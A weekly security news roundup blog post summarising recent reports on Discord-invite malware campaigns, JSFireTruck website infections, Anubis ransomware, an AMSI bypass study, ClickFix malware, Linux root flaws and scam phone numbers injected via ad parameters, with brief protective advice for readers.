Welcome to another week of our security review. By the looks of it, the usual cyber threats will be dominating our review, i.e. malware and vulnerabilities. They don’t look like they are going anywhere anytime soon. Also, and for the first time in a while, we’ll cover an article about research in computer security. Then, we’ll explore how scammers manage to show their phone numbers on legitimate websites of top brands like Microsoft and HP.
Discord flaw lets hackers reuse expired invites in malware campaign
The lesson here is not to trust expired Discord invites. And if you find yourself in a discord channel that asks you to copy, paste, and execute a command for „verification“ purposes, don’t. I repeat don’t listen to them.
So what happens if you ignore my advice? Here is what could happen to you:
The users are tricked into manually opening the Windows Run dialog and pasting a PowerShell command, which they had already copied to the clipboard for execution. Doing so triggers a multi-stage infection involving PowerShell downloaders, obfuscated C++ loaders, and VBScript files.
The final payloads are downloaded from the legitimate Bitbucket software collaboration and file hosting service, and include AsyncRAT, Skuld Stealer, and ChromeKatz.
Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
Threat actors will do anything to install malware on your device. In this instance, they are using a technique called JSFireTruck to redirect victims to a malicious Uniform Resource Locator (URL) that can serve threats that include malware and exploits.
Here is what you can take away from the article:
The campaign’s scale and stealth pose a significant threat,“ the researchers said. „The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities.
Anubis ransomware adds wiper to destroy files beyond recovery
In today’s digital world, what’s worse than losing your files to ransomware? Let me know in the comments section.
What else should I add? I believe the article title says it all. If it’s still not clear, here is a simple explanation: the ransomware steals your files, overwrites your copy with zeros, and of course, tells you to pay a ransom. They can also try (but may fail) to change your desktop wallpaper.
From the article (here „ransomware“ refers to Anubis):
The ransomware removes Volume Shadow Copies and terminates processes and services that could interfere with the encryption process. The encryption system uses ECIES (Elliptic Curve Integrated Encryption Scheme), and the researchers noted implementation similarities to EvilByte and Prince ransomware.
CrowdStrike Researchers Investigate the Threat of Patchless AMSI Bypass Attacks
A stunning research from CrowdStrike. If you’ve not read something like this before, I’ll caution you: it might make your head spin. Don’t worry, I am here to make it easy for you.
The article explores a novel, patchless AMSI bypass attack technique — dubbed VEH² — that allows adversaries to evade Windows‘ Antimalware Scan Interface (AMSI) stealthily. It teaches us that threat defense must keep pace with evolving adversary tradecrafts.
Here is an important lesson from the article:
As threat actors continue developing sophisticated AMSI bypass techniques, Falcon’s behavior-based detection powered by advanced machine learning provides a robust defense. By focusing on suspicious behaviors, CrowdStrike maintains its position at the forefront of endpoint protection, continuously adapting to evolving adversary tradecraft.
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack
When you think about accidental discovery, you can think about how the researchers discovered this malware. They found it when a corporate customer visited an infected travel site. At the end of the day, the final payload of the malware is Lumma Stealer, an infostealer. Please note that at the time of writing, the research is still ongoing.
Nonetheless, here is an excerpt from the article:
…the use of a compromised travel site would be attractive to individuals sufficiently wealthy to seek an expensive vacation (the Galapagos), and they would likely do so from home on their own PC. Such devices are not often protected by modern EDR – so the ClickFix use of LOLBINS would pass unseen.
New Linux udisks flaw lets attackers get root on major Linux distros
The flaws tracked as CVE‑2025‑6018 (discovered in Pluggable Authentication Modules (PAM)) and CVE‑2025‑6019 (discovered in libblockdev), allow attackers to escalate privileges to root on a broad range of major Linux distributions. We can learn from the article that the flaws underscore again how seemingly benign services and configurations such as udisks and PAM can combine into a powerful root exploit chain.
From the article:
While successfully abusing the two flaws as part of a „local-to-root“ chain exploit can let attackers quickly gain root and completely take over a SUSE system, the libblockdev/udisks flaw is also extremely dangerous on its own.
„Although it nominally requires ‚allow_active‘ privileges, udisks ships by default on almost all Linux distributions, so nearly any system is vulnerable.
Address bar shows hp.com. Browser displays scammers’ malicious text anyway
You can stay clear of this threat by not clicking on sponsored links in search results. These are search results with the „Sponsored“ text attached at the top left corner of the result.
From the article:
The unknown actors behind the scam begin by buying Google ads that appear at the top of search results for Microsoft, Apple, HP, PayPal, Netflix, and other sites.
While Google displays only the scheme and host name of the site the ad links to (for instance,
https://www.microsoft.com), the ad appends parameters to the path to the right of that address.When a target clicks on the ad, it opens a page on the official site. The appended parameters then inject fake phone numbers into the page the target sees.
Credits
Cover photo by Debby Hudson on Unsplash.
That’s it for this week, and I’ll see you next time.